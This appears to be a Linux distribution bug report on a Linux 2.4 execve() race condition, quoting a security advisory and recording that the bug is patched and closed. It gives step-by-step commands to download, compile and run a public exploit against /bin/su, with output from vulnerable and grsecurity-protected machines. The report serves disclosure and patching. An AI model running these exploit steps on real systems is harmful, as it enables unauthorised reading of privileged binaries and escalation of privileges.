Quote from http://www.securityfocus.com/bid/8042/discussion/ ---------------- A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. An attacker could potentially exploit this vulnerability to gain read access to a setuid binary that would otherwise be unreadable. Although unconfirmed, it may also be possible for an attacker to write code to a target executable, making it theoretically possible to execute arbitrary code with elevated privileges. ---------------- exploit: http://www.securityfocus.com/data/vulnerabilities/exploits/suiddmp.c I have tested the exploit in 3 different machines, but only 1 was vulnerable. I think the reason is two of them have grsecurity enabled, and the other doesn't. Reproducible: Always Steps to Reproduce: 1. wget http://www.securityfocus.com/data/vulnerabilities/exploits/suiddmp.c 2. cc -o suiddmp suiddmp.c 3. ./suiddmp /bin/su Actual Results: Output from the one without gresecurity: ---------------- lamb@alunos lamb $ ./suiddmp /bin/su Parent running pid 7341 Child running pid 7342Parent stat loop Parent success stating: uid 0 gid 0 mode 104755 inode 609245 size 23324 lamb@alunos lamb $ Password: su: Authentication failure Sorry. ---------------- and the other two with grsecurity enabled: ----------------pt_lamb@mestserv01 pt_lamb $ ./suiddmp /bin/su Parent running pid 10192 Parent stat loop Child running pid 7777 opened wrong file!: Bad file descriptor pt_lamb@mestserv01 pt_lamb $ Password: su: Authentication failure Sorry. ----------------
patches in gentoo-sources-2.4.20-r6
changing resolution to FIXED